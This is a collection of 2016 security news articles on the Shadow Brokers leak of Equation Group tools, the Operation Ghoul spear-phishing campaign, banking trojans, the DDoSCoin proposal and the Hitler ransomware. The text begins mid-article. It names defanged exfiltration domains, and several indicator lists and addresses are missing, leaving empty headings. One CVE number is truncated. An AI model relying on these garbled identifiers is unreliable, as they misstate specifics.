The Bitcoin.org suggests checking the hashes of Bitcoin Core binaries that are cryptographically signed with a known tkey.

“We strongly recommend that you download that key, which should have a fingerprint of 01EA5486DE18A882D4C2684590C8019E36C2E964. You should securely verify the signature and hashes before running any Bitcoin Core binaries. This is the safest and most secure way of being confident that the binaries you’re running are the same ones created by the Core Developers.”

In a thread on the news.ycombinator.com, experts discussed about the fact that bbitcoin.org does not implement HTTP Public Key Pinning (HPKP), this means that any government that controls a CA can generate its own cert for bitcoin.org, hijack the site’s IP and replace this page with their own fingerprint.


China controls the root CA China Internet Network Information Center (CNNIC) whom new certificates were banned last year by Mozilla and Google after one of its intermediate certificates was used to issue fake Google certificates.

Unfortunately, many threat actors are interested in launching cyber attacks against the Bitcoin users.

Recently several Bitcoin exchanges have been hacked, clamorous the security breach suffered by the Asian Bitfinex that led the theft of 120,000 Bitcoin.

The Bitcoin value significantly dropped after the discovery of the breach, it was observed a 20 percent decrease.

Crooks abused Google AdSense network to deliver malware on Android Devices

19.8.2016 securityaffairs Virus

Security experts from Kaspersky spotted a malware-based campaign that abused the Google Adsense Advertising network to spread a malicious code.
Mobile malware is becoming an even more insidious threat, security experts are observing a rapid diffusion of spyware that is able to steal sensitive data from victim’s mobile devices.

Very common are also malware that impersonates login pages of most popular applications and websites in the attempt of tricking users to provide their login credentials. Such kind of malware is able to steal private data, including banking credentials and social media account credentials.

Recently malware researchers from Kaspersky have spotted a new hacking campaign that abused Google AdSense to deliver a malware on Android devices. The malware is delivered on the victim’s mobile device when they visit certain Russian websites, even without user’s interaction.

The malicious code asks for admin rights and attempts to steal user credentials via displaying bogus login pages. The malware is able to perform other malicious operations, such as intercepting and deleting text messages.

“By simply viewing their favorite news sites over their morning coffee users can end up downloading last-browser-update.apk, a banking Trojan detected by Kaspersky Lab solutions as Trojan-Banker.AndroidOS.Svpeng.q. There you are, minding your own business, reading the news and BOOM! – no additional clicks or following links required. And be careful – it’s still out there!” reads a blog post published by Kaspersky.

Android malware Google adsense 3

The malware leverages on the Google AdSense advertising network to spread itself and many websites use this ad network.

Google has promptly fixed the problem, according to an email to a Google spokesman there is no indication that other websites are affected by the malware.

“The issue has since been resolved, a Google spokeswoman said in an email, adding that there’s no indication the attack ever affected more than one website. The company has said in the past that it works to block malware attacks from third-party ads distributed through its networks. The effort has become increasingly critical as Google and other advertising networks try to dissuade users from filtering out ads altogether with adblocking tools, which also aim to reduce ad-delivered malware and the web beacons used to track users across websites.” states the fastcompany.com.

In order to protect your mobile device keep your mobile OS up to date, install apps only from legitimate app stores and install security solutions.

The NSA Hack — What, When, Where, How, Who & Why?
18.8.2016 thehackernews Hacking
You might have heard about the recent ongoing drama of NSA hack that has sparked a larger debate on the Internet concerning abilities of US intelligence agencies as well as their own security.
Saturday morning the news broke that a mysterious group of hackers calling themselves "The Shadow Brokers" claimed it hacked an NSA-linked group and released some NSA hacking tools with a promise to sell more private "cyber weapons" to the highest bidder.
The group dumped a bunch of private hacking tools from "Equation Group" – an elite cyber attack unit linked to the NSA – on GitHub and Tumblr.
The Shadow Brokers hacking group has published the leaked data in two parts; one includes many hacking tools designed to inject malware into various servers and another encrypted file containing the "best files" that they made available for sale for 1 Million Bitcoins.
However, GitHub deleted the files from its page, not due to any government pressure, but because the hackers were demanding cash to release more data and the company's policy don't allow the auction or sale of stolen property on its source code management platform.
NSA Hack Raises a Few Important Question? The leak of advanced hacking tools allegedly stolen from the Equation Group has raised few questions in everyone's mind:
Is Equation Group an elite cyber attack unit linked to the NSA?
Are the Equation Group Hack and leaked exploits legitimate?
If Legit, Do the advanced hacking tools actually belong to Equation Group?
Who is behind the hack? Russia?
Here's all you need to know about the NSA Hack:
Kaspersky Confirmed: Leaked Hacking Tools Belong to NSA-tied Group
According to a technical report published Tuesday by security firm Kaspersky Lab, the leaked advanced hacking tools contains digital signatures that are identical to those in hacking software and malware previously used by the Equation Group.
"While we cannot surmise the attacker's identity or motivation nor where or how this pilfered trove came to be, we can state that several hundred tools from the leak share a strong connection with our previous findings from the Equation group," Kaspersky researchers said in a blog post.
Over 300 computer files found in the Shadow Brokers archive have a common implementation of RC5 and RC6 encryption algorithms – which has been used extensively by the Equation Group.
Also, the implementation of encryption algorithms is identical to the RC5 and RC6 code in the Equation Group malware.
"There are more than 300 files in the Shadow Brokers' archive which implement this specific variation of RC6 in 24 other forms," the researcher wrote. "The chances of all these being fakes or engineered is highly unlikely."
"The code similarity makes us believe with a high degree of confidence that the tools from the Shadow Brokers' leak are related to the malware from the Equation group."
Here's the comparison of the older Equation RC6 code and the code from the new leak, which shows that they have identical functionally and share rare specific traits in their implementation:
nsa hack equation group Comparison

Kaspersky Lab previously linked Equation Group to the NSA, describing it as "a threat actor that surpasses anything known in terms of complexity and sophistication of techniques, and that has been active for almost two decades."
The security firm also claimed Equation Group to be behind a variety of malware types, including Stuxnet and Flame, which are associated with cyber attacks launched by the United States.
Former NSA Personnel also Confirms the Authenticity of Leaked Data
Now, adding more proofs to the possibility and making the speculations stronger, some ex-NSA insiders say the leaked hacking tools are legitimate and linked to the NSA.
One former NSA employee who worked in its special hacking division, Tailored Access Operations (TAO), told the Washington Post that "without a doubt, they're the keys to the kingdom."
"The stuff you are talking about would undermine the security of a lot of major government and corporate networks both here and abroad," said the former TAO employee, who asked Post to remain anonymous.
Moreover, another former TAO employee who also saw the leaked file said, "From what I saw, there was no doubt in my mind that it was legitimate."
So, after Kaspersky Labs analysis and former-TAO employees statements, it is clear that the leaked NSA hacking tools are legitimate.
Hack Or An Inside Job?
Moreover, it has also been speculated that the NSA hack could be an insider’s job, as concluded by Matt Suiche, founder of UAE-based security startup after he discussed this incident with a former NSA TAO employee.
"The repository containing the NSA TAO Toolkit is stored on a physically segregated network which does not touch the internet and has no reason to (remember it's a toolkit repository)," Suiche wrote in a blog post.
"There is no reason for those files to have ever been on a staging server in the first place unless someone did it on purpose. The file hierarchy and the unchanged file naming convention tends to say that the files were directly copied from its source."
Experts and Snowden suggest Russia is behind the NSA Hack
Most cyber security experts, as well as former NSA contractor and whistleblower Edward Snowden, believes Russia to be behind the NSA hack.
In past few weeks, WikiLeaks and an unknown hacker using an alias Guccifer 2.0 have published a large number of documents came from the breach of the Democratic National Committee (DNC) and another separate hack of the Democratic Congressional Campaign Committee (DCCC).
Several officials from US intelligence agencies and security companies have pointed fingers towards Russia for the recent Democratic hacks, though Russia has denied any involvement.
"The Federal Bureau of Investigation and U.S. intelligence agencies have been studying the Democratic hacks, and several officials have signaled it was almost certainly carried out by Russian-affiliated hackers," the WSJ reports. "Russia has denied any involvement, but several cybersecurity companies have also released reports tying the breach to Russian hackers."
Now, both Snowden and Dave Aitel, a security expert who spent 6 years as an NSA security scientist, are speculating that the latest leak by the Shadow Brokers is in response to growing tensions between the United States and Russia over the Democratic groups' hacks.
In a stream of tweets yesterday, Snowden said the hack is likely of Russian origin, tweeting "No one knows, but I suspect this is more diplomacy than intelligence, related to the escalation around the DNC hack."
Here's the combined statement by Snowden:
"Circumstantial evidence and conventional wisdom indicate Russian responsibility. Here's why that is significant:
This leak is likely a warning that someone can prove US responsibility for any attacks that originated from this malware server. That could have significant foreign policy consequences. Particularly if any of those operations targeted US allies. Particularly if any of those operations targeted elections. Accordingly, this may be an effort to influence the calculus of decision-makers wondering how sharply to respond to the DNC hacks. TL;DR: This leak looks like a somebody sending a message that an escalation in the attribution game could get messy fast."
Following Snowden tweets, Aitel also published a blog post, saying Russia is the most likely suspect behind the Democratic hacks as well as the latest leak of the NSA spying tools.
Apart from speculation, Wikileaks, which previously made it clear to harm Hillary Clinton's chances from becoming US President, also said it already own the "auction" files from the Shadow Brokers and will publish them in "due course," though the tweet has since been deleted.
Still, many questions remain unanswered — who is the Shadow Brokers, how the group broke into Equation Group and stole their private hacking tools and malware, and is the group really willing to bid the auction files for 1 Million Bitcoins or is it just a distraction?

Operation Ghoul: targeted attacks on industrial and engineering organizations
18.8.2016 Kaspersky Attack

Kaspersky Lab has observed new waves of attacks that started on the 8th and the 27th of June 2016. These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions. The attackers try to lure targets through spear phishing emails that include compressed executables. The malware collects all data such as passwords, keystrokes and screenshots, then sends it to the attackers.

#OpGhoul targeting industrial, manufacturing and engineering organizations in 30+ countries
We found that the group behind this campaign targeted mainly industrial, engineering and manufacturing organizations in more than 30 countries. In total, over 130 organizations have been identified as victims of this campaign. Using the Kaspersky Security Network (KSN) and artifacts from malware files and attack sites, we were able to trace the attacks back to March 2015. Noteworthy is that since the beginning of their activities, the attackers’ motivations are apparently financial, whether through the victims’ banking accounts or through selling their intellectual property to interested parties, most infiltrated victim organizations are considered SMBs (Small to Medium size businesses, 30-300 employees), the utilization of commercial off-the-shelf malware makes the attribution of the attacks more difficult.

In total, over 130 organizations have been identified as victims of Operation Ghoul #OpGhoul
In ancient Folklore, the Ghoul is an evil spirit associated with consuming human flesh and hunting kids, originally a Mesopotamian demon. Today, the term is sometimes used to describe a greedy or materialistic individual.

Main infection vector: malicious emails

The following picture represents emails that are being used to deliver malware to the victims, in what looks like a payment document. The e-mails sent by attackers appear to be coming from a bank in the UAE, the Emirates NBD, and include a 7z file with malware. In other cases, victims received phishing links. A quick analysis of the email headers reveals fake sources being utilised to deliver the emails to victims.


Malicious attachments

In the case of spear phishing emails with an attachment, the 7z does not contain payment instructions but a malware executable (EmiratesNBD_ADVICE.exe). We have observed executables with the following MD5s:

Malware MD5 hashes


Email file MD5 hashes


The spear phishing emails are mostly sent to senior members and executives of targeted organizations, most likely because the attackers hope to get access to core intelligence, controlling accounts and other interesting information from people who have the following positions or similar:

Chief Executive Officer
Chief Operations Officer
General Manager
General Manager, Sales and Marketing
Deputy General Manager
Finance and Admin Manager
Business Development Manager
Export manager
Finance Manager
Purchase manager
Head of Logistics
Sales Executive
Technical details

Malware functionality

The malware is based on the Hawkeye commercial spyware, which provides a variety of tools for the attackers, in addition to malware anonymity from attribution. It initiates by self-deploying and configuring persistence, while using anti-debugging and timeout techniques, then starts collecting interesting data from the victim’s device, including:

Clipboard data
FileZilla ftp server credentials
Account data from local browsers
Account data from local messaging clients (Paltalk, Google talk, AIM…)
Account data from local email clients (Outlook, Windows Live mail…)
License information of some installed applications
#OpGhoul malware collects all data such as #passwords, keystrokes and screenshots
Data exfiltration

Data is collected by the attackers using primarily:

Http GET posts
Sent to hxxp://
Email messages
mail.ozlercelikkapi[.]com (, mail to info@ozlercelikkapi[.]com
mail.eminenture[.]com (, mail to eminfo@eminenture[.]com
Both ozlercelikkapi[.]com and eminenture[.]com seem to belong to compromised organisations operating in manufacturing and technology services.

Malware command center

The malware connects to to deliver collected information from the victim’s PC. This information includes passwords, clipboard data, screenshots…


Operation Ghoul: Targeted Attacks on Industrial and Engineering Organizations

The IP address seems to belong to a compromised device running multiple malware campaigns.

Victim information

Victim organizations are distributed in different countries worldwide with attackers focused on certain countries more than others:

Operation Ghoul: Targeted Attacks on Industrial and Engineering Organizations

Number of Victim Organisations by Country

Countries marked as “others” have less than three victim organizations each, they are: Switzerland, Gibraltar, USA, Sweden, China, France, Azerbaijan, Iraq, Turkey, Romania, Iran, Iraq and Italy.

Victim industry information

Victim industry types were also indicators of targeted attacks as attackers were looking to infiltrate organizations that belong to the product life cycle of multiple goods, especially industrial equipment.

#Manufacturing #transportation #travel targets of #OpGhoul
Operation Ghoul: Targeted Attacks on Industrial and Engineering Organizations

Number of Victim Organizations by Industry Type

Victim industry description

Industrial Petrochemical, naval, military, aerospace, heavy machinery, solar energy, steel, pumps, plastics
Engineering Construction, architecture, automation, chemical, transport, water
Shipping International freight shipping
Pharmaceutical Production/research of pharmaceutical and beauty products
Manufacturing Furniture, decor, textiles
Trading Industrial, electronics and food trading
Education Training centers, universities, academic publishing
Tourism Travel agencies
Technology/IT Providers of IT technologies and consulting services
Unknown Unidentified victims
The last attack waves

Kaspersky Lab user statistics indicate the new waves of attacks that started in June 2016 are focused on certain countries more than others.

#opghoul highly active in #MiddleEast
Hundreds of detections have been reported by Kaspersky Lab users; 70% of the attacked users were found in the United Arab Emirates alone, the other 30% were distributed in Russia, Malaysia, India, Jordan, Lebanon, Turkey, Algeria, Germany, Iran, Egypt, Japan, Switzerland, Bahrain and Tunisia.


Other attack information

Phishing pages have also been spotted through, and although they are taken down quickly, more than 150 user accounts were identified as victims of the phishing links sent by the attackers. Victims were connecting from the following devices and inserting their credentials, a reminder that phishing attacks do work on all platforms:

Mac OS X
The malware files are detected using the following heuristic signatures:



Operation Ghoul is one of the many attacks in the wild targeting industrial, manufacturing and engineering organizations, Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments. In addition, privileged users need to be well trained and ready to deal with cyber threats; failure in this is, in most cases, the cause behind private or corporate data leakage, reputation and financial loss.

Indicators of Compromise

The following are common among the different malware infections; the presence of these is an indication of a possible infection.

Filenames and paths related to malware


List of malware related MD5 hashes


List of malware related domains


Observed phishing URLs


Other malware links

Malware links observed on dating back to March and April 2016:


Cisco, Fortinet issue fixes against Equation Group exploits

18.8.2016 Vulnerebility

Customers of Cisco and Fortinet security firms need to patch their products to fix the flaws exploited by the Equation Group exploits and hacking tools.
While security experts are analyzing the hacking tools leaked in the data dump by the Shadow Brokers, security firms are working to fix the vulnerabilities exploited by the Equation Group toolsets.

Both Fortinet and Cisco have issued patches to address exploits that were leaked online, the list of affected products includes versions of Cisco’s PIX and ASA firewalls and versions of Fortinet Fortigate firewalls.

nsa hack equation group Comparison

Cisco has confirmed that the two exploits EPICBANANA and EXTRABACON can be used to achieve remote code execution on Cisco firewalls.

Cisco confirmed that the code leaked by the “Shadow Brokers” includes exploits for the following flaws:

Cisco ASA SNMP Remote Code Execution Vulnerability
Cisco ASA CLI Remote Code Execution Vulnerability
The Cisco ASA SNMP Remote Code Execution vulnerability is a newly found vulnerability, both TALOS and Cisco IPS have produced signatures to detect them:

Snort Rule ID: 3:39885
Legacy Cisco IPS Signature ID: 7655-0
The Cisco ASA CLI Remote Code Execution Vulnerability was addressed in a defect fixed in 2011.

Fortinet also confirmed the bugs in its systems in a security advisory, the flaw is present in versions prior to 2012 of the FortiGate firmware.

The company informed its customers of the presence of a cookie parser buffer overflow, confirming that Versions 5.x are not affected.

“FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability. This vulnerability, when exploited by a crafted HTTP request, can result in execution control being taken over.” states the advisory.
“Affected firmware versions are lower versions of 4.x firmware release.
FOS 5.x firmware is NOT affected.”

“This vulnerability, when exploited by a crafted HTTP request, can result in execution control being taken over”, the advisory says. If a product can support 5.x firmware, that should be installed; if not, version 4.3.9 or above also fixes it.”

Customers of the company targeted by the exploits included in the leaked archive are invited to read the security advisory from the security vendors and to adopt the necessary countermeasure.

Let’s remind that despite the vast majority of the files is dated back 2013, in some cases the hacking tools could result still effective.

Vawtrak banking Trojan improved once again, now with SSL Pinning
17.8.2016 securityaffairs Virus

Security experts from Fidelis firm spotted a new version of the Vawtrak banking Trojan that includes significant improvements such as the SSL pinning.
Malware researchers from security firm Fidelis have spotted a new strain of the infamous Vawtrak banking Trojan that leverages on a DGA mechanism to generates .ru domains with a pseudorandom number generator (PRNG) discovered in the loader.

Vawtrak, aka Neverquest, has been around for several years, it was used by criminal organizations to target online banking customers worldwide.

Vawtrak banking Trojan

The new variant of the Vawtrak banking trojan includes new significant improvements such as the use of the HTTPS protocol to protect communication with the control infrastructure. The threat leverages on certificate pinning which isn’t so common for malware.

The SSL pinning provides an addition level of protection against man-in-the-middle attacks, in the specific case, the certificate pinning is implemented to avoid detection of security solutions that use their own certificates to inspect the traffic.

The new variant of the Vawtrak banking Trojan conducts some checks based on the Common Name, in this way the threat is able to establish connections only to legitimate C2 servers.

“This new Vawtrak DLL contains code for performing an HTTPS connection as well, but it also performs some checks on the certificate it receives from the C2 server. It adds up all the characters in the Common Name and then divides the byte by 0x1a and adds 0x61, which should match the first character (Figure 5). It also uses a public key from the aforementioned initial inject header to verify the signature hash that was passed in the SubjectKeyIdentifier field of the certificate.” states the blog post published by the Fidelis firm.

The threat was delivered via both mass-spam campaigns, threat actors behind it also spread the malware through exploit kits.

“Vawtrak has been a very successful banking trojan, delivered via both mass-spam campaigns as well as through exploit kits. Keeping this in consideration, it’s not surprising that new features and techniques are being introduced.” continues the blog post. “The use of DGAs and TLS is widespread across various crime families, but SSL pinning is still rare,”

Vawtrak is an efficient banking trojan thanks to the continuous improvements, the SSL pinning recently introduced represents a novelty in the banking malware landscape.

Someone is Spying on Researchers Behind VeraCrypt Security Audit
17.8.2016 thehackernews Krypto
After TrueCrypt mysteriously discontinued itself, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, and privacy conscious people.
Due to the huge popularity of VeraCrypt, security researchers from the OSTIF (The Open Source Technology Improvement Fund) announced at the beginning of this month that it had agreed to audit VeraCrypt independently.
Using funds donated by DuckDuckGo and VikingVPN, the OSTIC hired vulnerability researchers from QuarksLab to lead the audit, which would look for zero-day vulnerabilities and other security holes in VeraCrypt's code.
Now, the most troubling part comes here:
The OSTIF announced Saturday that its confidential PGP-encrypted communications with QuarkLabs about the security audit of VeraCrypt were mysteriously intercepted.
"We have now had a total of four email messages disappear without a trace, stemming from multiple independent senders." the OSTIF said. "Not only have the emails not arrived, but there is no trace of the emails in our "sent" folders. In the case of OSTIF, this is the Google Apps business version of Gmail where these sent emails have disappeared."
The information linked to the VeraCrypt security audit is so confidential that the OSTIF instructed QuarksLab research team to give "any results of this audit directly to the lead developer of VeraCrypt using heavily encrypted communications."
This strict instruction was suggested at the beginning of this project to prevent the zero-day vulnerabilities from going into wrong hands or snoopers.
The team of researchers behind this security audit hopes to go public with their findings in mid-September after reporting all the detected vulnerabilities, if any, in VeraCrypt to its original authors and get them patched.
Until then, all the participants of the VeraCrypt Audit Project are required to maintain the utmost secrecy.
However, the sudden disappearance of four PGP-encoded email messages, each sent by independent parties involved in the project, has raised concerned about the leakage of confidential data, including weaknesses found in VeraCrypt.
The OSTIF suspects some outsiders are attempting to listen in on and/or interfere with the VeraCrypt security audit process.
"If nation-states are interested in what we are doing we must be doing something right," the OSTIF concludes.
Now, the OSTIF has switched to an alternative (undisclosed) encrypted communications process in order to move forward with the VeraCrypt audit project.
For more information Stay Tuned!

CVE-2016-569 Linux flaw leaves 1.4 billion Android devices vulnerable to hack
17.8.2016 securityaffairs Vulnerebility

Experts from Lookout revealed that all Android versions running the Linux Kernel 3.6 to the latest are affected by the CVE-2016-569 Linux flaw.
Recently I wrote about a severe vulnerability (CVE-2016-5696) affecting the Linux version 3.6, deployed in 2012. The flaw was discovered by researchers from the University of California, Riverside, and the U.S. Army Research Laboratory that presented their findings at the USENIX Security 2016 conference.

The TCP/IP networking flaw allows attackers to spot communications between two entities and can be exploited to hijack the traffic and manipulate it if the exchange is not encrypted.

The attack is not considerable a man-in-the-middle attack, the attackers just need to send spoofed packets to both sides of the connection by simply knowing their IP addresses and destination ports.

Linux design flaw attack

According to the experts at Lookout security, the Linux vulnerability affects 80% of Android devices, it appears to have been introduced into Android version 4.4 (also called KitKat) and it is still present in the current versions.

“Lookout recently discovered a serious exploit in TCP reported this week also impacts nearly 80% of Android, or around 1.4 billion devices, based on an install base reported by Statista. The vulnerability lets attackers obtain unencrypted traffic and degrade encrypted traffic to spy on victims.” reported Lookout security in a blog post.

The Linux vulnerability could be exploited by attackers to hijack traffic, inject malware into downloads and web pages, and run a wide range of attacks.

In a classic attack scenario, hackers can inject a malicious JavaScript into unencrypted network traffic and display a message that falsely claims the user has been logged out of his account and request him to provide the login credentials.

A patch for the Linux kernel was available since July 11, 2016, but checking the latest developer preview of Android Nougat, the Google OS is still affected by the flaw.

A Google spokesman confirmed that it is already working on the issue by “taking the appropriate actions.” The Google representative highlighted that the Android security team only rates the risk “moderate.”

NSA's Hacking Group Hacked! Bunch of Private Hacking Tools Leaked Online
15.8.2016 thehackernews Hacking
It seems like the NSA has been HACKED!
An unknown hacker or a group of hackers just claimed to have hacked into "Equation Group" -- a cyber-attack group allegedly associated with the United States intelligence organization NSA -- and dumped a bunch of its hacking tools (malware, private exploits, and hacking tools) online.
Not just this, the hackers, calling themselves "The Shadow Brokers," are also asking for 1 Million Bitcoins (around $568 Million) in an auction to release the 'best' cyber weapons and more files.
I know, it is really hard to believe, but some cybersecurity experts who have been examining the leak data, exploits and hacking tools, believe it to be legitimate.
Widely believed to be part of the NSA, Equation Group was described as "a threat actor that surpasses anything known in terms of complexity and sophistication of techniques, and that has been active for almost two decades," according to a report published by security firm Kaspersky in 2015.
Equation Group was also linked to previous infamous Regin and Stuxnet attacks, allegedly the United States sponsored hacks, though the link was never absolutely proven.
Two days back, The Shadow Brokers released some files, which it claimed came from the Equation Group, on Github (deleted) and Tumblr.
Exploits for American & Chinese Firewalls Leaked:
The files mostly contained installation scripts, configurations for command-and-control (C&C) servers, and exploits allegedly designed to target routers and firewalls from American manufacturers including, Cisco, Juniper, and Fortinet.
According to the leaked files, Chinese company 'Topsec' was also an Equation Group target.
The leak mentioned names of some of the hacking tools that correlate with names used in the documents leaked by whistleblower Edward Snowden, like "BANANAGLEE" and "EPICBANANA."
"We follow Equation Group traffic," says the Shadow Broker. "We find Equation Group source range. We hack Equation Group. We find many many Equation Group cyber weapons. You see pictures. We give you some Equation Group files free, you see. This is good proof no? You enjoy!!! You break many things. You find many intrusions. You write many words. But not all, we are auction the best files."
It is yet not confirmed whether the leaked documents are legitimate or not, but some security experts agree that it likely is.
"I haven't tested the exploits, but they definitely look like legitimate exploits," Matt Suiche, founder of UAE-based cyber security firm Comae Technologies, told the Daily Dot.
NSA Planted Stuxnet-Type Malware Deep Within Hard Drive Firmware
While some are saying that the leak could be a very well-researched hoax, and the Bitcoin auction could be nothing but a distraction in an attempt to gain media attention.
"If this is a hoax, the perpetrators put a huge amount of effort in," security researcher The Grugq told Motherboard. "The proof files look pretty legit, and they are exactly the sorts of exploits you would expect a group that targets communications infrastructure to deploy and use."
However, if NSA has successfully been hacked, the hack would be a highly critical cyber security incident.

DDoSCoin — New Crypto-Currency Pays Users for Participating in DDoS Attacks
14.8.2016 thehackernews Attack

It’s 2016, and now, you can earn some dollars by contributing into well-organized DDoS attack scheme.
Do you know while mining Bitcoins you are actually contributing a significant computational power to keep the Bitcoin network running?
In Bitcoins, the miners actually build and maintain massive public ledger containing a record of every Bitcoin transaction in history.
When one user tries to send Bitcoins to another user, the miners validate the transfer by checking the ledger to make sure the sender is not transferring money he/she does not have, adding the transaction to the ledger and then finally sealing it behind layers and layers of computational work to protect that ledger from getting compromised or hacked.
So for this, miners are rewarded with Bitcoins.
So, basically, you are contributing the massive amount of computing power that keeps the Bitcoin transactions running and makes you earn some cryptocurrency in return as an incentive.
However, Bitcoin has long been criticized for not utilizing that huge amount of computational power into something useful as well.
To utilize all those CPU cycles, a few years back researchers came forward with another cryptocurrency, called "PrimeCoin."
In PrimeCoin, the miners’ computational power is not only used to keep the transaction running but also used to find the long chain of the prime number, which plays a great role in encryption and cryptography.
But, this time, a pair of curious researchers recently proposed the weirdest concept:
A malicious digital currency that can be mined only if the miners participate in Distributed Denial of Service (DDoS) attacks against preselected target websites make them temporarily unavailable by flooding them with Millions of simultaneous requests.
Proof-of-DDoS: Participate in DDoS Attack and Earn Reward
DDoSCoin, developed by Eric Wustrow and Benjamin VanderSloot from the University of Colorado Boulder and the University of Michigan, is a theoretical cryptocurrency that rewards a miner for opening a large number of TLS connections to target web servers.
The malicious proof-of-work (which the duo called "Proof-of-DDoS") model used by DDoSCoin miners functions only with websites that support TLS 1.2, and since over half of the top million websites support TLS 1.2 version of the protocol, it will be easy for miners to earn the reward.
"In modern versions of TLS, the server signs a client-provided parameter during the handshake, along with server-provided values used in the key exchange of the connection," the researchers wrote in the paper DDoSCoin: Cryptocurrency with a Malicious Proof-of-Work [PDF], allowing the client to prove that it has participated in the DDoS attack against the target server.
In this way, the new system will reward users who prove they have participated in a DDoS attack.
Miners with DDoSCoin blocks could then trade their cryptocurrencies for other, including Bitcoin and Ethereum, the researchers suggested.
The researchers presented their paper at the Usenix 2016 security conference, noting that Bitcoin's computationally intensive proof-of-DDoS "does not contribute to any useful problems besides securing the currency from attack."

If you want to set up a target for DDoS, you can use the PAY_TO_DDOS transaction that includes two arguments:
Domain of the victim website.
The number of TLS connections that need to be established.
These transactions are recorded as DDoSCoin blocks inside a database (or blockchain). Now, miners only need to select one of the blocks, launch attacks, and thus receive DDoSCoin as a reward for fulfilling the transaction.
What If Everybody wants to DDoS Everybody?
Now, the question here is: How this cryptocurrency will decide, which target should get DDoSed on priority?
According to researchers, multiple miners must participate and decide together which domain to be attacked.
Future Schemas and DDoS Frameworks
Till now, we have seen multiple hire-for-DDoS services in the underground market, where anyone willing to take down a targeted website can just pay hackers and get their job done.
At the current, this paper is only a theoretical concept, and the DDoSCoin crypto-currency currently does not exist.
However, I can predict that soon we would see similar business models by blackhat hackers, where to earn money, people would themselves join botnet networks to contribute their bandwidth for DDoS attacks.

Hitler ransomware just deletes files instead encrypt them
14.8.2016 securityaffairs Virus

Security experts detected and analyzed a new threat, the Hitler ransomware, that doesn’t encrypt files but simply deletes them. Ransomware is one of the most dreaded threats for Internet users and a profitable business for crooks. In the last months, we have seen a number of malware belonging to this category, one of the most recent is a Hitler-themed ransomware that doesn’t encrypt files, but simply deletes them.

Hitler ransomware

In reality, the threat appears to be a work in progress project developed by coders without specific skills.

The Windows ransomware displays a lock screen featuring Hitler, together with a message that warns users that files have been encrypted.

The ransomware requests the payment of only 25 euros, in the form of a Vodafone cash card. It is unusual for such kind of crimes.

The lock screen features a misspelling “Ransonware.”

The website Bleeping Computer published a detailed analysis of the Hitler ransomware that was first spotted by the malware analyst Jakub Kroustek from AVG.

“This ransomware appears to be a test variant based on the comments in the embedded batch file and because it does not encrypt any files at all. Instead this malware will remove the extension for all of the files under various directories, display a lock screen, and then show a one hour countdown as shown in the lock screen below.” reads the post published by Bleeping Computer “After that hour it will crash the victim’s computer, and on reboot, delete all of the files under the %UserProfile% of the victim. I hope this is not the actual code that this ransomware developer plans on using if it goes live.”
Hitler ransomware
Visualizza l'immagine su Twitter
Jakub Kroustek @JakubKroustek
*sigh* #Hitler #Ransomware. #GrammarNazi. https://www.virustotal.com/en/file/06c8e0f6fa2616f4fa92c610a1faea23887ac31db8fa78cede49b6b8c80ec22f/analysis/1470566199 …
21:09 - 7 Ago 2016
27 27 Retweet 21 21 Mi piace
The experts have found the string “Das ist ein Test” (“This is a test”) in an embedded batch file, a circumstance that suggests the developer are German based.